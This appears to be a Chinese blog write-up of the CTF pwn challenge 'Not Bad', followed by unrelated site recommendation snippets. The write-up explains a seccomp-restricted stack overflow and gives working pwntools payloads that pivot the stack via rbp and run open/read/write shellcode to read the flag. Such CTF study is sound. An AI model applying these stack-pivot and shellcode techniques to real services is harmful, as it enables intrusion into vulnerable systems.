[BUUCTF][极客大挑战 2019]Not Bad -- 栈劫持与Shellcraft

做的时候没注意到有个后门函数,有点搞复杂了。不过做法还怪有意思的,记录一下。


checksec

先走流程checksec一下,啥保护都没开。但这题在第三页,看来不是道二傻子题,必有蹊跷。我们来仔细看看:

程序逆向分析

漏洞点-mmap可执行内存块

mmap

首先映入眼帘的是这程序一上来就给我们搞了块可执行的内存空间,注意第三个参数prot,指示了映射区域的保护方式,这里是6 = 2 | 4,代表可读可执行。我其实一直搞不清PROT_EXEC、PROT_READ、PROT_WRITE三个标志对应的具体值,借着写writeup的机会测试了一下:
prot.c

运行结果

另外,手册指出,在一些硬件上PROT_WRITE蕴含着PROT_READ,尽管手册上是用i386举了例子,我猜amd64也是一个道理。尽管prot是6,做的过程中GDB读这块内存是没有问题的。
image.png

保护机制seccomp

这题的突出特点在于sub_400949,这里使用了seccomp模块。

sub_400949

seccomp(SECure COMPuting)安全计算是 Linux 内核 2.6.12 版本引入的安全模块,主要是用来限制某一进程可用的系统调用 (system call)。关于细节这里不再讲述(我也不太懂),总之还是注意seccomp_rule_add()的第三个参数,这里是[0, 1, 2, 60],代表只有这四个syscall可用,分别是[read, write, open, exit]。很显然这是道ORW类的题目,我们要打开(Open)包含flag的文件,读(Read)它,然后写(Write)到控制台上。

尽管这题没开那些checksec里的保护机制,但这里整了个狠活儿。

漏洞点-栈溢出

sub_400A16

继续浏览程序,相信你一眼就能看出sub_400A16处存在一个栈溢出,这里也是我们搞事情的起点。缓冲区bufrbp的距离是0x20,再算上rbp本身,写入的0x38字节中我们只有0x10字节是可以用来控制程序执行流的。这是本题的难点,这点内存用来搞ROP是不够的。如果我们这里有0x20字节的空间,可以这样:

payload = b''.join([
    cyclic(0x20),
    b'_old_rbp',
    p64(pop_rdi_ret),                   # ------------------
    p64(elf.got['puts']),               #     可用溢出空间
    p64(elf.plt['puts']),               #         0x20
    p64(elf.symbols['_start']),         # ------------------
]))

泄露出puts地址进而获得libc基址,然后再溢出返回到one_gadget就搞定了。但可惜没有0x20,我们得另寻它策。
如前面所说,这题有个后门函数通过它可以把前面的0x28空间利用上,但我做的时候没注意到,所以接下来不会出现到它。

它策

可用的溢出空间只有0x10,这代表我们只能改变一次返回地址。如果我们知道栈地址的话,可以直接返回到buf开头处利用上前面的0x28空间,这样和利用后门函数的思路是一样的,其他师傅讲的很好了,这里不再赘述。既然我们找不到栈,就让栈来找我们。
我们重新审视下溢出点:

read(0, buf, 0x38uLL);

这段代码将0x38个字节从标准输入读到buf处。最有趣的地方来了,buf是哪?我们知道它是一个栈上变量,那它自然应该是在栈上,但具体是哪呢?

对应的汇编代码

阅读汇编代码可以发现,这个位置具体是rbp-20。一般来说这确实是一个栈地址,但我们可以控制rbp。如下构造第一个payload

target_addr = 0x123000
assistant_addr = target_addr + 0x100

p.sendafter(b'Easy shellcode, have fun!\n', b''.join([
    cyclic(0x20),
    p64(assistant_addr+0x20),
    p64(0x400A1E),
]))

与往常别的题不同,这回我们精心设置了一个rbp的值,然后返回到read之前。在新的一轮执行时,rbp已经指向了0x123020。回想下前面的分析,buf是一块相对rbp变化的地址,新的这次read会控制0x123000-0x123037的0x38字节。此时rsp还在原来栈上,但这不是问题,函数最后的leave会将rsp引向我们新的栈空间,从而完成栈劫持。如下构造第二个payload

rd =  shellcraft.read(0, target_addr, 0x100)
rd += shellcraft.push('rsi')
rd += shellcraft.ret()
rd =  asm(rd)

p.sendafter(b'Easy shellcode, have fun!\n', b''.join([
    rd.ljust(0x20, b'\x00'),
    p64(0xdeadbeef),
    p64(support_addr),
]))

这里和A师傅的思路就类似了区别在于我们现在准确的知道buf地址,所以不再需要借助后门函数,直接return过去就好了。为了writeup的完整,附上最后一个payload

sh = shellcraft.open('./flag')
sh += shellcraft.read(3, target_addr, 0x100)
sh += shellcraft.write(1, target_addr, 0x100)
sh =  asm(sh)

p.send(sh)
p.interactive()

这题是真的有意思,小有收获,小有收获。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,287评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,346评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,277评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,132评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,147评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,106评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,019评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,862评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,301评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,521评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,682评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,405评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,996评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,651评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,803评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,674评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,563评论 2 352

推荐阅读更多精彩内容

  • 07.19 CTF特训营---REVERSE阅读P208——P 1、X86指令体系 寄存器组 汇编指令集:Inte...
    gufsicsxzf阅读 1,467评论 0 0
  • 例题1 MTCTF babyrop (64位) 思路 题目情况:发现有个循环,一次读一个字节,如果你输入失败或者输...
    e4l4阅读 1,155评论 0 1
  • 1. 概说 缓冲区溢出又叫堆栈溢出(还有许许多的称呼),这是计算机程序难以避免的漏洞,除非有新的设计方式将程序运行...
    读书郞阅读 5,649评论 4 27
  • 参考:https://www.anquanke.com/post/id/208364%5C[https://www...
    that_is_this阅读 840评论 0 1
  • 题目源代码 分析一下,为了getshell我们要想办法输入命令system(“\bin\sh”),可以把这些命令写...
    Queen_耳又又阅读 1,127评论 0 0